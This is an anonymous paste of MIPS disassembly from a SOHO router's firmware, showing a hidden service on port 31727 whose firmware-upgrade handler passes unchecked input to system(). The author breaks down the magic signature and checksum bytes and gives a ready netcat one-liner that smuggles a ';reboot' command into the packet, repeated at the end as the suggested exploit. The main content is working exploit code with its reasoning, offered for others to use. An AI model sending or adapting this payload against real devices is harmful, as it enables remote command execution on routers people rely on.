Untitled
a guest
Oct 23rd, 2013
SOHO routers being hyped to the point of silly IDA workshops, I mean come on, really?

That stuff is basically kindergarten level of the 90s.

If you want some cheap street cred, here goes after 20 minutes of looking at my home router. Feel free to blog or make a YouTube video about it:

echo "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00" | nc router 31727
(port 31727: http://seclists.org/nmap-dev/2013/q2/426)

.text:004011CC move $a0, $s2
.text:004011D0 beq $v0, $s4, loc_4010BC
.text:004011D4 addiu $a2, $fp, 0xD8+var_30
.text:004011D8 la $t9, accept
.text:004011DC nop
.text:004011E0 jalr $t9 ; accept
.text:004011E4 nop
.text:004011E8 lw $gp, 0xD8+var_C8($fp)
.text:004011EC move $s1, $v0
.text:004011F0 move $a3, $zero
.text:004011F4 move $a1, $s3
.text:004011F8 move $a0, $s1
.text:004011FC beq $s1, $s4, loc_4012AC
.text:00401200 li $a2, 0x5DC
.text:00401204 la $t9, recv
.text:00401208 nop
.text:0040120C jalr $t9 ; recv
.text:00401210 nop

User name is 8 bytes, "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2":

.rodata:00403820 COMM_SIGN: .byte 0xC6 # DATA XREF: dispatch:loc_4014E0o
.rodata:00403820 # send_ack+3Co ...
.rodata:00403821 .byte 0x52 # R
.rodata:00403822 .byte 0x46 # F
.rodata:00403823 .byte 0x31 # 1
.rodata:00403824 .byte 0xC8 # + # DATA XREF: send_ack+64r
.rodata:00403825 .byte 0x9C # £
.rodata:00403826 .byte 0xC4 # -
.rodata:00403827 .byte 0xE2 # G
.text:004014E0 # ---------------------------------------------------------------------------
.text:004014E0
.text:004014E0 loc_4014E0: # CODE XREF: dispatch+30j
.text:004014E0 la $a1, COMM_SIGN
.text:004014E4 move $a0, $s0
.text:004014E8 li $a2, 8
.text:004014EC la $t9, memcmp
.text:004014F0 nop
.text:004014F4 jalr $t9 ; memcmp
.text:004014F8 nop
.text:004014FC lw $gp, 0x30+var_20($sp)
.text:00401500 beqz $v0, loc_40151C
.text:00401504 nop
.text:00401508 la $a0, 0x400000
.text:0040150C nop
.text:00401510 addiu $a0, (aSignatureMisma - 0x400000) # "signature mismatch!!\n"
.text:00401514 b loc_4015F8
.text:00401518 nop

Password is a tricky beast:

First, pass \0 in buf[9] to deal with this wtf:

.text:0040151C # ---------------------------------------------------------------------------
.text:0040151C
.text:0040151C loc_40151C: # CODE XREF: dispatch+88j
.text:0040151C lbu $v0, 9($s0)
.text:00401520 nop
.text:00401524 beqz $v0, loc_401554
.text:00401528 li $a0, 0xFF
.text:0040152C lbu $v1, 0xB($s0)
.text:00401530 nop
.text:00401534 addu $v0, $v1
.text:00401538 beq $v0, $a0, loc_401554
.text:0040153C nop
.text:00401540 la $a0, 0x400000
.text:00401544 nop
.text:00401548 addiu $a0, (aIsnTRequestCom - 0x400000) # "Isn't REQUEST command or checksum erro"...
.text:0040154C b loc_4015F8
.text:00401550 nop

after which buf[0x8] and buf[0xa] must sum to 0xff:

.text:00401554 loc_401554: # CODE XREF: dispatch+ACj
.text:00401554 # dispatch+C0j
.text:00401554 lbu $a1, 8($s0)
.text:00401558 lbu $v0, 0xA($s0)
.text:0040155C li $v1, 0xFF
.text:00401560 addu $v0, $a1, $v0
.text:00401564 beq $v0, $v1, loc_401580
.text:00401568 nop
.text:0040156C la $a0, 0x400000
.text:00401570 nop
.text:00401574 addiu $a0, (aCommandChecksu - 0x400000) # "command checksum error!!\n"
.text:00401578 b loc_4015F8
.text:0040157C nop

Finally comes the command itself: buf[0xc] is 0 for all intents and purposes, buf[0xd] selects the handler from the _fdata table, and the function arguments start at buf[0xe]...

.text:00401580 loc_401580: # CODE XREF: dispatch+ECj
.text:00401580 la $a0, _fdata
.text:00401584 nop
.text:00401588 lbu $v0, (_fdata - 0x10000000)($a0)
.text:0040158C nop
.text:00401590 beqz $v0, loc_401640
.text:00401594 move $s1, $zero
.text:00401598 move $v1, $a0
.text:0040159C addiu $a3, $a0, (off_10000004 - 0x10000000)
.text:004015A0 move $a0, $zero
.text:004015A4 lbu $v0, (_fdata - 0x10000000)($v1)
.text:004015A8
.text:004015A8 loc_4015A8: # CODE XREF: dispatch+1A4j
.text:004015A8 addiu $a0, 8
.text:004015AC bne $v0, $a1, loc_401614
.text:004015B0 addiu $v1, 8
.text:004015B4 lbu $a2, 0xC($s0)
.text:004015B8 lbu $v0, 0xD($s0)
.text:004015BC sll $a2, 8
.text:004015C0 addu $v1, $s1, $a3
.text:004015C4 addu $a2, $v0
.text:004015C8 lw $v0, 0($v1)
.text:004015CC move $a0, $s2
.text:004015D0 addiu $a1, $s0, 0xE
.text:004015D4 move $t9, $v0
.text:004015D8 jalr $t9
.text:004015DC nop
.text:004015E0 lw $gp, 0x30+var_20($sp)
.text:004015E4 bgez $v0, loc_401624
.text:004015E8 nop
.text:004015EC la $a0, 0x400000
.text:004015F0 nop
.text:004015F4 addiu $a0, (aCallFunctionRe - 0x400000) # "call function return error!!\n"
.data:10000000 # Segment type: Pure data
.data:10000000 .data
.data:10000000 .globl _fdata
.data:10000000 _fdata: .word 1 # DATA XREF: dispatch:loc_401580o
.data:10000000 # dispatch+110r ...
.data:10000000 # Alternative name is '_fdata'
.data:10000000 # command
.data:10000004 off_10000004: .word get_info # DATA XREF: dispatch+124o
.data:10000008 .word 2
.data:1000000C .word write_id
.data:10000010 .word 4
.data:10000014 .word upgrade_fw
.data:10000018 .word 6
.data:1000001C .word set_domain
.data:10000020 .word 0
.data:10000024 .word 0
.data:10000028 .align 4

Of course, we'd like to update firmware:

.text:00401D94 .globl upgrade_fw
.text:00401D94 upgrade_fw: # DATA XREF: .data:10000014o
.text:00401D94 # .got:upgrade_fw_ptro
.text:00401D94
.text:00401D94 var_90 = -0x90
.text:00401D94 var_8C = -0x8C
.text:00401D94 var_88 = -0x88
.text:00401D94 var_80 = -0x80
.text:00401D94 var_78 = -0x78
.text:00401D94 var_10 = -0x10
.text:00401D94 var_C = -0xC
.text:00401D94 var_8 = -8
.text:00401D94 var_4 = -4
.text:00401D94
.text:00401D94 li $gp, 0xFC0629C
.text:00401D9C addu $gp, $t9
.text:00401DA0 addiu $sp, -0xA0
.text:00401DA4 sw $gp, 0xA0+var_80($sp)
.text:00401DA8 la $v0, 0x400000
.text:00401DAC nop
.text:00401DB0 addiu $v0, (aCommandIsUpgra - 0x400000) # "command is UPGRADE_FW\n"
.text:00401DB4 sw $s1, 0xA0+var_C($sp)
.text:00401DB8 sw $s0, 0xA0+var_10($sp)
.text:00401DBC move $s1, $a0
.text:00401DC0 move $s0, $a1
.text:00401DC4 move $a0, $v0
.text:00401DC8 sw $ra, 0xA0+var_4($sp)
.text:00401DCC sw $gp, 0xA0+var_8($sp)
.text:00401DD0 la $t9, printf
.text:00401DD4 nop
.text:00401DD8 jalr $t9 ; printf
.text:00401DDC nop
.text:00401DE0 lw $gp, 0xA0+var_80($sp)
.text:00401DE4 lbu $a2, 0($s0)
.text:00401DE8 lbu $a3, 1($s0)
.text:00401DEC lbu $v1, 3($s0)
.text:00401DF0 lbu $v0, 2($s0)
.text:00401DF4 addiu $a0, $sp, 0xA0+var_78
.text:00401DF8 la $a1, 0x400000
.text:00401DFC nop
.text:00401E00 addiu $a1, (aTftpGwGetD_D_D - 0x400000) # "tftp gw get %d.%d.%d.%d:/%s"
.text:00401E04 addiu $s0, 4
.text:00401E08 sw $s0, 0xA0+var_88($sp)
.text:00401E0C sw $v0, 0xA0+var_90($sp)
.text:00401E10 sw $v1, 0xA0+var_8C($sp)
.text:00401E14 la $t9, sprintf
.text:00401E18 nop
.text:00401E1C jalr $t9 ; sprintf
.text:00401E20 nop
.text:00401E24 lw $gp, 0xA0+var_80($sp)
.text:00401E28 addiu $a1, $sp, 0xA0+var_78
.text:00401E2C la $a0, 0x400000
.text:00401E30 nop
.text:00401E34 addiu $a0, (aUseCommandS - 0x400000) # "use command '%s'\n"
.text:00401E38 la $t9, printf
.text:00401E3C nop
.text:00401E40 jalr $t9 ; printf
.text:00401E44 nop
.text:00401E48 lw $gp, 0xA0+var_80($sp)
.text:00401E4C addiu $a0, $sp, 0xA0+var_78
.text:00401E50 la $t9, system
.text:00401E54 nop
.text:00401E58 jalr $t9 ; system

Well thank you. The final "exploit", or is it shellcode, would be something along the lines of "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00", but I didn't test it. I'm too lazy to ruin my OpenWrt on my BR-6104K.